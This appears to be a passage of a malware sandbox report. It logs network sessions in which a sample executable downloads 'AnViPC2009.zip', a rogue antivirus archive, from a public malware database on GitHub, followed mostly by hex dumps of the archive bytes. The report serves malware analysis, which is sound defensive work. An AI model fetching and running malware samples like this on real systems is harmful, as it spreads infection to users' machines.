                                                                                                                                                2022-09-29 12:51:33 UTC10382INData Raw: 04 9f 6d 42 ab 1f 67 b6 57 ce 60 e4 52 26 09 b3 58 8f 19 57 75 f6 6f 9e e8 bc 23 3f ff 70 1f 18 4f e8 44 42 63 a4 81 11 2f 4c 99 4a 61 ee 07 8a 46 18 f1 03 3c c5 07 9d 4b 42 f7 8f ff e3 13 e6 3d 7b 4b 56 09 64 ba 65 98 f1 15 04 27 9b eb c8 16 fe 9b 55 4c 6a b9 12 39 66 94 21 70 82 a6 36 2c bb 51 71 13 2c c2 ae 51 e1 14 75 cf db 2f ac 05 11 01 03 51 b8 46 8e 78 38 1c 5a da 09 4a 27 5c 42 34 a6 5f c7 7a 72 64 ce a8 c2 10 4c 03 f7 00 05 47 6e 26 1b b7 48 9c 9e 11 3e 52 34 c3 e7 73 15 05 cc 9e 3e 08 3f 6e 71 82 bc 9a d6 fe 7a 94 b1 f5 b2 3a e6 9f 9b c5 50 c6 7b 85 42 d1 0a 86 70 dc 05 ec 3b d8 f3 98 67 89 3f 3b 6e 12 13 48 1c a7 b0 ad a0 19 8c a6 fc dd 81 aa d8 4e f1 44 31 1e 49 d8 6b f2 ce 19 54 df 48 75 7e 11 04 f6 97 1d 24 8e 65 17 78 d6 40 c1 11 17 62 0f
                                                                                                                                                Data Ascii: mBgW`R&XWuo#?pODBc/LJaF<KB={KVde'ULj9f!p6,Qq,Qu/QFx8ZJ'\B4_zrdLGn&H>R4s>?nqz:P{Bp;g?;nHND1IkTHu~$ex@b
                                                                                                                                                2022-09-29 12:51:33 UTC10398INData Raw: fe 2d c2 6f 2d 29 e5 51 cd 06 0b 04 eb a6 78 4e 27 e6 63 e2 2f 87 7b 43 53 a8 f7 a6 bf 31 4b 13 5f 8d 59 c4 b8 1e 2a af 63 1e e2 09 74 cc fc e7 4b 18 b7 07 cc 64 44 03 be 1d 46 9d ec fb 28 a8 6d b3 36 51 a8 7b 3d 44 82 5a d9 16 5b 90 c1 bb ea a3 0f 50 45 fa af 07 ae 05 e1 20 18 90 14 a9 56 5a 4c 46 1f 30 18 f2 e9 e9 e4 f6 d6 63 d0 a7 68 e6 0e 88 96 3e e9 db ce e5 59 d5 b4 6a 56 ca d9 26 b7 d7 0b 05 b5 e0 e0 0b 5d ab 57 3c 1f 7b cf ad 9c 34 48 22 85 d3 52 c1 0f 56 40 ab 18 14 9a 34 06 40 28 23 f5 e9 52 f9 de a8 e1 11 08 f2 6d 0d a1 e5 e8 59 cf 8b 8e f0 1b 72 4b f1 84 de 58 de 90 28 07 7c ae ab 70 89 37 96 6e d8 1e 5f 02 f4 62 c1 5a a0 3b fd 2a 91 5c 72 7c 37 9e 9f 49 bc eb 2a d7 e0 bc 49 ff 23 9c a0 e2 32 ac 72 ba 76 1f f7 87 f1 ad 1c 18 ed 11 10 c8 18 e4
                                                                                                                                                Data Ascii: -o-)QxN'c/{CS1K_Y*ctKdDF(m6Q{=DZ[PE VZLF0ch>YjV&]W<{4H"RV@4@(#RmYrKX(|p7n_bZ;*\r|7I*I#2rv
                                                                                                                                                2022-09-29 12:51:33 UTC10414INData Raw: e3 f7 b0 19 09 2c ec 2c 9c 0f 13 80 9d 42 5d f9 e8 3d b3 92 e1 d2 ef fa e5 0d bb 75 50 55 63 4e 13 70 fd 2b 7b b6 f5 39 b6 1b f7 c9 9d 8e dc 75 20 3e 2e 04 b7 42 56 b7 b5 3e e5 5d cb 8b cf 16 95 42 3a 52 9d ab 87 f5 af c6 82 28 04 71 1f ef f5 57 ff ca 80 b8 98 58 61 6d 82 cb 07 37 e3 ea 65 05 7e ef 4d 27 56 58 d3 20 b0 d1 73 85 af 7f 2c 55 88 b4 38 3d c4 9f 74 7f 8f 79 5e 4a 22 ae 4d 06 a3 3d 43 d9 b4 6a 90 b5 4e 6a db 3f 10 ce 7b 07 97 2e 00 48 36 76 4d 79 7d 19 e0 71 14 08 ba 05 cf 2a da a2 0c f9 27 04 b3 3a 46 b3 be c1 a3 b8 34 f3 e8 4f 90 ae c9 77 e1 8a 84 a4 84 43 97 3d 95 1b 9f 7c 26 cc 2b 35 df f0 c7 86 02 a1 1b 82 47 8d be ef 09 7a de 7b 39 a3 7c ce 5f 94 b7 cd 88 c2 60 66 8c e6 9c f4 a0 ed fb dc d0 62 a3 78 cb 43 84 db 77 65 df 4a af bd 4c 3b b0
                                                                                                                                                Data Ascii: ,,B]=uPUcNp+{9u >.BV>]B:R(qWXam7e~M'VX s,U8=ty^J"M=CjNj?{.H6vMy}q*':F4OwC=|&+5Gz{9|_`fbxCweJL;
                                                                                                                                                2022-09-29 12:51:33 UTC10430INData Raw: 7c b5 a6 af 1e 9c 5d 6a 73 d2 25 dd d0 d6 fa 84 5c 8a 7e cc b6 80 ae 1e af 1d 0e df 7d 94 ad 1e 68 b4 83 30 0e d9 f2 30 d0 76 7f 5b 30 72 25 2f f0 87 1b 44 c0 b6 e2 89 b8 aa 16 dd a9 bb c3 25 75 ed a6 39 3e df af 45 d0 62 ef e2 73 a1 b8 35 69 ec d7 76 43 95 86 a4 87 19 5c 49 cb 13 90 b9 65 64 84 2f bd aa 22 51 a6 5a a9 b7 5b 8c 2d 41 61 df 82 7c 20 bf 39 52 9e 3a 38 6e 60 f7 03 a8 8f e3 71 7f 48 c9 97 93 d0 d1 39 fc 37 f7 4d 4b 64 8f b5 c6 2a b0 38 f1 6f 85 47 2a 51 53 94 aa 25 eb 06 1b 98 b5 89 ea 0c 03 29 2b 85 1b fa 02 32 7a 28 06 3b 66 24 e2 f1 f0 40 b5 ce 7b ff b4 fc 5c 35 5f 6c 65 e0 2f 2f 9d 0a 15 8e da 94 0c c1 43 87 a0 92 2b 3d 1f 5f 82 71 b3 b7 ad 6a 64 61 05 a6 0d 38 62 22 1d c6 ef 9b a7 92 02 4f ed ec d1 64 f3 f6 72 71 96 48 d3 db 3c 2e 7b 38
                                                                                                                                                Data Ascii: |]js%\~}h00v[0r%/D%u9>Ebs5ivC\Ied/"QZ[-Aa| 9R:8n`qH97MKd*8oG*QS%)+2z(;f$@{\5_le//C+=_qjda8b"OdrqH<.{8
                                                                                                                                                2022-09-29 12:51:33 UTC10446INData Raw: c4 5a 8a 9e 81 cf ca 29 6c 17 c5 e4 91 98 a2 c6 7a ce 79 d6 d9 87 6f 5f 02 ba 8a e4 36 33 36 d7 fa 3c 96 51 b2 8e 54 69 35 0c c2 49 b1 9c 01 3f 6c 75 c5 37 d5 94 44 49 7e 5a 0d db 07 3d d2 4a 6b 03 dc 4c d1 cf b7 5e 31 d5 0c 8d a0 a7 2a 8c 3c 76 de 80 84 b8 45 d7 f2 9d d4 42 4a 2c f5 93 1c 38 88 52 e6 ec d7 f0 ca 78 9d 87 8c f2 f7 90 5c 9d 9e 2d 37 c1 24 e9 34 31 58 ef 0d 21 31 7d cd 7f 98 77 a4 e4 83 48 d5 18 19 e8 1b 3e 99 9f f7 c0 16 f2 10 55 9f d9 f9 25 06 7b a4 d9 82 7c 79 d6 f9 69 21 46 c7 84 dd 84 ef 5b 8a f2 a8 67 07 1c 86 fe 9b 7e e7 35 42 38 12 0c 4c 41 97 a9 3f 5a a9 8c 0a 24 e7 df 3f e8 43 4f 38 d4 58 0c 90 90 b1 9e 81 78 5a f9 9d b2 34 39 d7 61 9a d7 5c 17 7a 5c 6f a7 2d 42 6a 71 70 55 aa c9 e6 c4 de 93 6c 08 df 74 91 e0 8f 10 8d 55 3a 64 4d
                                                                                                                                                Data Ascii: Z)lzyo_636<QTi5I?lu7DI~Z=JkL^1*<vEBJ,8Rx\-7$41X!1}wH>U%{|yi!F[g~5B8LA?Z$?CO8XxZ49a\z\o-BjqpUltU:dM
                                                                                                                                                2022-09-29 12:51:33 UTC10462INData Raw: 9b da 10 64 f7 14 e8 65 20 31 b2 28 fc e9 a1 19 e8 b4 ee 50 7f 77 15 56 5a 05 1c 65 a0 52 cf 36 0a 9f 69 7e 3b 33 c4 c2 7d d7 bc 78 19 41 71 7a 78 2c 32 5e b9 21 65 88 96 03 3b ac 6b a5 b6 69 4c 15 5b ea d5 ad 7a 32 35 ef 8a bf a9 19 39 b3 f6 48 70 b5 4b 6c 2d f2 ec 4d 4f 82 40 2a 5d d8 35 3a 1a 29 92 e4 35 a9 91 40 50 53 f6 1f ec 44 12 72 ea ea 45 2c 8e ea d6 01 b6 23 aa 52 a5 44 ba 20 99 d5 25 24 17 76 bb 68 e7 60 a7 41 66 ee c6 d4 14 31 8e cd 62 94 cd cf 96 5b 8a 60 6f 7d 8e a7 96 aa 98 13 50 48 76 ab 81 71 70 83 3d e2 8c d6 54 c7 71 2f 12 d5 0e 8e 5f 45 98 37 9b 1e 5d f2 9d b0 cc ea 97 db 83 5b 90 d8 00 3f 5b 9a 2c 78 1b d9 2d 98 be 51 a1 f6 04 45 41 71 0c 37 37 25 58 7d f6 7f 67 4f 2e ad 88 fe 8d c7 67 09 c9 45 dc fd 3c 6b 0a 6a 26 b4 16 73 d0 86 12
                                                                                                                                                Data Ascii: de 1(PwVZeR6i~;3}xAqzx,2^!e;kiL[z259HpKl-MO@*]5:)5@PSDrE,#RD %$vh`Af1b[`o}PHvqp=Tq/_E7][?[,x-QEAq77%X}gO.gE<kj&s
                                                                                                                                                2022-09-29 12:51:33 UTC10478INData Raw: f3 ff 20 64 17 aa 27 2c 0e 83 94 04 1a e4 36 62 03 45 50 cc 48 6d f9 72 f3 d0 eb 42 ec 2b cb 93 3c e7 0e 8f c8 08 1a 6e a5 0d 10 8a 23 e5 fc 87 1a e7 ae 21 8b 77 49 88 20 e2 89 13 5c d8 6f e5 3e a9 38 a5 b5 67 cf fc b0 59 71 e9 6d 29 0e 15 07 18 61 35 66 bf 01 f8 56 a4 e6 68 2a 4a 0b 09 53 4f f9 09 45 33 dd b0 6d e9 79 e7 19 df 06 cd be e6 6a 74 88 3a a5 d1 5c 7e 02 78 15 a4 6b fd ee 08 45 b3 fc 00 4d 9d 0e f0 7e 64 b8 39 a4 14 fd 43 c7 5a 0e fa 29 a2 ad ee be f3 87 91 97 79 a7 3f f3 68 54 d1 f8 7d b2 94 ef 88 c9 8d bd fe e1 41 50 ce 6e 0d ed c0 d2 d3 8e 8f 75 1b 07 8d 12 8b f6 99 6c 42 be b2 60 7c 9a 84 d6 01 53 03 7f 64 0f 30 f4 b8 bb 5b 80 5e a9 b2 08 7e b8 1f 94 bd 36 f8 9c 90 97 14 b3 6c d9 d2 3d 7a e4 75 2a f2 98 f1 2d 7d c5 49 08 df bc c6 54 fe 22
                                                                                                                                                Data Ascii: d',6bEPHmrB+<n#!wI \o>8gYqm)a5fVh*JSOE3myjt:\~xkEM~d9CZ)y?hT}APnulB`|Sd0[^~6l=zu*-}IT"


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                34192.168.2.549734140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:33 UTC10480OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:33 UTC10480INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:27 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:33 UTC10481INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                35192.168.2.549735185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:33 UTC10483OUTGET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:33 UTC10483INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1178406
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "4b7f39242bdc3c2d1323de2cf6529b8807eb1cfe6f7dc4241f8df746b2145355"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0866:67BD:BA80D:1793D0:6335928F
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:33 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6967-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455894.922745,VS0,VE2
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 6bf3af8880df210bc681f9334ed410f8d8a7b67e
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:33 GMT
                                                                                                                                                Source-Age: 108
                                                                                                                                                2022-09-29 12:51:33 UTC10484INData Raw: 50 4b 03 04 33 00 01 00 63 00 c3 5c f5 3c 00 00 00 00 58 fa 11 00 5a bb 12 00 19 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 56 69 50 43 32 30 30 39 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 18 1e 19 ad d3 ff 2d 34 78 35 ff b8 e5 42 12 9c 05 07 97 5d 8c 1a 3c eb c6 99 7d 87 2f 61 b9 e2 28 ee 82 71 5c ce 7b 7c 30 98 9b eb 94 90 c9 3c 15 7b b7 9c ba 5f ff 0a 3a ba bb f0 04 ba 43 3a ee c9 99 f4 b2 d8 3c 52 0e eb 5c 5d b2 e2 78 a5 65 02 53 2a 04 41 4d 0f 32 09 f9 96 bf d5 21 02 00 db 0f 54 dd fd 79 94 e9 75 e8 be e9 32 91 5f 70 01 4e 0b b8 02 bb c3 53 72 9f ea f9 c2 8c 2f 31 b8 0f 6f 9e 32 7f 96 1e 1d 26 00 13 55 a5 44 92 af a0 7a 25 bb ba 49 a6 1f 52 6e 15 0e 72 dd 98 30 df ba c9 10 ed e7 c7 80 d6 00 cf 6d e4 2c 60 84 51 9a 88 a2 aa d4 0c dd 3c eb db
                                                                                                                                                Data Ascii: PK3c\<XZEndermanch@AnViPC2009.exeAE-4x5B]<}/a(q\{|0<{_:C:<R\]xeS*AM2!Tyu2_pNSr/1o2&UDz%IRnr0m,`Q<
                                                                                                                                                2022-09-29 12:51:33 UTC10485INData Raw: f0 89 95 f9 82 16 4d 9f bc c0 c4 30 d2 18 2b 95 f7 c3 87 5c ec 63 db 65 52 73 c4 32 83 3a 07 d7 99 f3 32 e1 8f 52 02 16 a8 ad 95 19 72 b9 2f d6 2b 3a fd ec ce 99 d5 e7 be 78 09 d5 08 31 ce 3c 2b fb 48 65 13 32 23 4a b0 2b 7c ca 5f 70 6d 2f 1a af 52 17 f6 f2 61 fc 1d a6 9b 78 de 94 a1 e8 f9 ad 49 b3 30 2f 9e e4 12 5c b1 a9 26 a8 45 dc 7c c9 02 7a 32 c5 f5 95 d0 d0 7b fe 0c 0d 23 ee bd 71 20 1c 8b 68 5d a1 ce 07 fa 07 6b 00 c7 5e 7f 30 aa bd c1 5a 14 f3 25 1f 16 3e 74 27 fb 06 d0 80 52 ed e6 39 4a 9c 87 25 49 5a c5 5b 26 b8 4b d6 d4 29 c2 56 81 e8 94 e7 64 c3 f7 0e 69 db 9a ec 51 77 ba ea d2 2a 14 40 c8 c2 2f d9 64 15 d6 57 34 66 40 5b 20 e0 40 43 55 e4 27 25 c2 d5 61 03 db 15 e3 3b d4 64 49 bf 9a d1 84 a9 e8 6f 17 82 43 ad 17 4e c5 37 ac 78 04 a6 64 fd 07
                                                                                                                                                Data Ascii: M0+\ceRs2:2Rr/+:x1<+He2#J+|_pm/RaxI0/\&E|z2{#q h]k^0Z%>t'R9J%IZ[&K)VdiQw*@/dW4f@[ @CU'%a;dIoCN7xd
                                                                                                                                                2022-09-29 12:51:33 UTC10486INData Raw: 68 81 6a cd b0 eb 9a 8d 7f 24 a9 1c 87 f3 dd 52 f2 64 7d 9e 45 9d da 90 19 e2 2d 1c 7b 26 df 0c f0 b6 0b 93 87 34 b5 ee 6b 42 2f e0 42 81 48 f9 4c a1 06 8e 15 db d1 4b 4b 54 0e 7e 56 68 a0 ac dc 20 16 49 32 1c 3e c2 5e b0 cb 9c 01 61 bf 15 fe 84 1a 93 9b ef 26 c0 39 6b 84 7d ba d2 d8 0c ba 26 58 a4 77 fa 4f ca c9 b1 f3 4c 4f 5c 6d 2e 91 c5 a9 84 46 bf 00 97 c1 fa 82 9a 1d 54 57 ef 6c 93 0b ec 3d fd d7 d5 8a 99 f2 33 50 16 ef 9e 80 ed 5e d6 b6 23 f0 90 5d 08 13 38 54 8e 91 8e e6 ed 2f 88 93 bc 27 31 dc ff 51 5a a7 99 1b e2 06 66 d9 0e 4c 70 6a e2 06 f3 1d 6c f2 c7 5a e9 ae a3 9d 70 3c 73 c7 ec 25 b6 90 f2 11 0b e8 26 7c 7a e9 f4 cb c5 1e df 9a 76 5d 4c 65 00 b7 a7 9b 7a a1 e8 3c 09 ff a9 b5 89 93 ee fd b1 8b 9b c8 ad a3 b5 0c 70 82 51 f5 f5 2b f5 40 0c f6
                                                                                                                                                Data Ascii: hj$Rd}E-{&4kB/BHLKKT~Vh I2>^a&9k}&XwOLO\m.FTWl=3P^#]8T/'1QZfLpjlZp<s%&|zv]Lez<pQ+@
                                                                                                                                                2022-09-29 12:51:33 UTC10488INData Raw: 89 4c b0 e0 7d a9 1e 3c f2 11 50 95 69 af 11 35 3f 8c 13 48 1d 2b e3 c1 ce 2f 6f d4 78 46 5e ba 26 71 6d 91 b6 4a 28 a4 40 42 37 0c 09 ef 1d 5f ba 8a 7c da d1 be 33 d8 af ad 54 29 8a dd f2 58 93 86 12 f5 16 d1 c1 eb 29 18 2c 5c 00 94 1f a2 ec 0e 6f 45 91 a0 5c ca 36 d4 9a d9 17 1a 6e 85 42 5a 0b 3b 7c 97 2d 9f 8e 8a d4 ce 3f 91 f2 18 28 1d d6 fa ff d3 1a 60 29 0b 1c b7 bb f4 64 79 39 9c c9 ab f5 3e 6e 95 82 a6 ed b2 27 fb bc e1 a1 e8 47 44 1e aa 45 3d d1 49 52 38 22 9f 36 60 2c 23 b8 7d 43 63 04 bb 92 26 ff 8d d9 cc 95 27 55 c2 53 7f f7 0b fd 6b 13 b9 4b 50 ed 8d 9b 1f 7d ca 39 90 00 4e 9f c4 f6 2a c3 4f 78 73 0b 56 82 4f f8 41 37 af 22 b7 a8 fb 83 d1 41 4b 87 fa 20 26 2f 6b 20 ef 4e d3 c1 db fe d7 50 df 31 24 f6 44 a2 c7 b4 5a cb 36 28 d3 46 c1 64 f9 f7
                                                                                                                                                Data Ascii: L}<Pi5?H+/oxF^&qmJ(@B7_|3T)X),\oE\6nBZ;|-?(`)dy9>n'GDE=IR8"6`,#}Cc&'USkKP}9N*OxsVOA7"AK &/k NP1$DZ6(Fd
                                                                                                                                                2022-09-29 12:51:33 UTC10489INData Raw: 75 67 f7 df ce 69 be 17 7d 81 ee d1 54 1c e1 92 e7 e8 da 54 1a 42 cc 2a e0 f1 8d f5 a0 86 5a 2f 9c 05 d1 f4 52 19 ac a3 97 9e 66 88 1f 10 8e 37 da 1d 44 07 35 7d 42 cb 86 c3 96 37 ed 54 bc 51 0a 36 ae f1 55 08 6d 71 be 95 ac c1 bb 90 aa 62 9a 0b 60 45 ba e2 c4 77 ae f6 e1 f6 34 0f 12 d3 73 37 ad aa 16 9c 45 4d 7d 54 87 2a 75 2f 81 a7 02 b1 ce db 94 8c 59 83 04 38 57 ef e9 19 48 63 5e d5 80 ae 13 90 2e 5d dd c9 fb a8 14 d7 e8 72 b1 62 f0 b9 bf 84 ad 73 45 45 f8 ff f9 bc af a9 77 a0 bb f2 55 10 4a d9 7f f5 d9 17 56 2d dc 76 ff f5 88 76 29 55 35 4e 47 ab 70 6f 11 cb 2e ea c5 88 8e 7f 2b 08 a3 7f 37 9d ac af 05 88 ee be c9 04 0e c3 b2 16 0b af 9d 83 b3 85 f1 0b 24 ed cf aa 54 47 35 d8 60 d5 19 3b bf 99 01 cc 61 43 5a c4 84 d4 7e 8f 6e c4 0a 94 ba 9a f7 92 2e
                                                                                                                                                Data Ascii: ugi}TTB*Z/Rf7D5}B7TQ6Umqb`Ew4s7EM}T*u/Y8WHc^.]rbsEEwUJV-vv)U5NGpo.+7$TG5`;aCZ~n.
                                                                                                                                                2022-09-29 12:51:33 UTC10490INData Raw: 8f e8 8a ba 8a 7a 1e 97 1a d5 b6 e0 89 63 9e 05 b1 db 17 24 85 ee d3 69 b0 9e de 01 8e ce d1 26 fc 76 76 05 3e be a0 34 f2 ac 16 f9 24 6d a3 89 14 a5 e4 ac 75 8d d0 77 39 bb 48 36 81 0b c5 18 b7 d3 45 da 68 6e cb 48 d2 be 59 b0 a9 0b d6 84 60 92 d5 0f 62 3f 69 06 46 c1 4b 0c 14 c2 79 70 04 49 9f c9 ed c0 3c 7e f4 d9 c7 3e bc fa e9 22 35 5a 56 cf a3 83 bb 3e ad 38 e9 2e c9 63 d9 2e a7 db 9b 7c 4a ac c8 de 15 0d b8 87 88 97 74 8b 20 7c 72 67 71 bb 55 8e 7e ae 8d aa 17 31 a9 51 37 3a 7b 84 fc b5 ce e1 fe e4 cd d6 62 be 9f c5 be da 96 d0 11 bf d0 72 f4 2c 99 46 e3 b0 ed 0a 2f cb 9a b3 2f 92 17 12 95 cd 2e 8f 2a f7 76 ab b5 05 b6 d4 22 55 a7 d8 cf f5 68 70 73 8d bb 9b bf e2 9e 6f e8 32 c6 49 d0 1e ae 98 15 cd 0a 45 06 cc 11 ae a9 56 9b 7e 01 7d 10 36 7f b1 ec
                                                                                                                                                Data Ascii: zc$i&vv>4$muw9H6EhnHY`b?iFKypI<~>"5ZV>8.c.|Jt |rgqU~1Q7:{br,F//.*v"Uhpso2IEV~}6
                                                                                                                                                2022-09-29 12:51:33 UTC10492INData Raw: 8a ac b8 d1 29 05 19 47 48 43 69 12 1f 87 a5 64 0e d2 19 a8 e3 b0 cf 56 de df 41 9c 42 c6 67 94 a8 14 1b 3c 90 60 50 bc e0 8f 72 00 82 2a e2 32 2d e4 81 67 74 c7 e1 50 45 f0 bd d3 c6 db c2 3d b0 eb 66 98 5b a0 18 9c 61 82 27 bb 69 73 22 0e 94 69 22 ac 49 3f 2a f3 14 b4 f4 36 9e 2f 1a 26 84 e5 08 41 ca c5 27 7e b8 1f ce b0 35 83 a4 74 50 c3 c4 8f f3 53 e3 9e 30 40 e8 bc 3a 4b 37 77 bb bd c0 20 4b 16 5d 59 56 b9 45 f5 c1 9d be 8e 9a f5 3b 60 2d 80 c4 a4 8b 37 64 02 a0 46 b2 a6 d8 7e 69 5c 42 74 12 98 ee 2b 9f ec 36 27 fe 24 a5 5b da 4f 8b 9a 87 c1 f3 f5 44 85 b1 5a 9f ed 4a db ea 35 db 93 d4 f0 45 20 16 f6 6c 6e 20 cf 6d f2 cd 9f 5d b7 19 fc 6a 46 0a 9d 07 04 e5 fa d1 2a 8d b8 11 4e a2 d1 ff a3 4e 5a 56 46 75 d3 98 00 5a d1 6a 6d e0 76 06 2f 61 c2 43 dc 46
                                                                                                                                                Data Ascii: )GHCidVABg<`Pr*2-gtPE=f[a'is"i"I?*6/&A'~5tPS0@:K7w K]YVE;`-7dF~i\Bt+6'$[ODZJ5E ln m]jF*NNZVFuZjmv/aCF
                                                                                                                                                2022-09-29 12:51:33 UTC10493INData Raw: e9 df 1d 84 48 a4 46 6f d5 4c 87 98 a0 fc 6c c3 d8 50 11 e8 cf 2d c1 31 e3 43 72 1d 86 35 16 48 bd bd 6e 07 b9 96 bd 57 c8 9b fb 4f 81 94 c8 74 b0 55 09 f9 a1 f7 8c 2f 8f 6a 7b fd 9b bf 1b ac 99 e3 be d2 ae 41 8e 79 0e 01 e8 b0 4a ba d1 7f 78 de 35 ba 99 7f f3 9b fe 05 75 ac 07 18 f8 53 8f 34 83 0c 9f 77 3a b4 5b b1 65 04 22 58 c6 d5 bf 31 f6 81 71 d9 96 25 3b 32 b9 aa 13 14 28 ea ca 35 43 2c 11 05 a8 39 ef 46 3c bc 92 3d 6a 64 e9 fe 3e 5c 04 25 59 82 83 77 4d c9 63 c6 63 bb 55 54 d5 c8 4f a3 32 57 6c 39 bf 71 72 9f 00 64 3e 62 88 9c 07 c0 ab bd 87 a3 99 3d a4 5e aa b7 56 42 9a 60 e7 3f bb cd 7b 18 05 f7 ac 5f fc 8b f0 f4 52 89 b7 97 e9 35 bb c9 64 00 44 d8 b7 ae c6 a4 80 c5 f9 7f fa b4 09 15 c6 08 80 80 56 b4 b7 d2 47 ed a3 2c da 5e 82 31 36 db ce e7 41
                                                                                                                                                Data Ascii: HFoLlP-1Cr5HnWOtU/j{AyJx5uS4w:[e"X1q%;2(5C,9F<=jd>\%YwMccUTO2Wl9qrd>b=^VB`?{_R5dDVG,^16A
                                                                                                                                                2022-09-29 12:51:33 UTC10494INData Raw: a2 02 c3 cc 46 53 58 2e ee 8b 01 ae 7e 91 39 3b f9 da ea ba 2f e4 d0 e8 72 b8 e7 1a ab 03 78 fb ed 46 44 19 29 3a 52 37 89 82 bc 19 44 ac a4 63 ad 11 ee 4b 56 a2 29 6e e1 7d a4 7c 6d d1 a8 85 b5 79 f1 6e f9 af a7 e1 8c 49 1a c4 be d2 9b 6b 7e 15 c5 69 31 f4 79 20 8c 8f f2 3e ed 21 03 2d 09 dc a9 5f 4a 7d f5 4b c0 6d 8a 13 28 f6 02 a5 2f 39 bd 21 9a f8 3c 13 30 d4 3e 9d 1d a0 bc cf d7 fd 2c 3b da 32 d0 9e 1b 91 da 49 54 39 eb 3f b3 f3 82 cb 07 a5 c5 67 2b 41 4b 03 55 fe 21 e1 86 63 9b ff d1 ed c7 3f 57 ed 14 f8 df fa 8f 5d e8 08 80 f3 c4 bb 99 2e e0 25 3e cd a2 bd 98 44 ee 68 d6 96 82 9b 1f b1 22 40 2d 13 d0 01 c4 e1 99 ec 96 e3 2c 17 a9 80 28 6d 72 71 b6 67 f8 d3 63 3f e4 26 2e c9 6a 00 fb 12 ad bc ae b3 df 82 21 9a b3 23 c3 22 2b 63 0e 33 10 04 f0 a8 7a
                                                                                                                                                Data Ascii: FSX.~9;/rxFD):R7DcKV)n}|mynIk~i1y >!-_J}Km(/9!<0>,;2IT9?g+AKU!c?W].%>Dh"@-,(mrqgc?&.j!#"+c3z
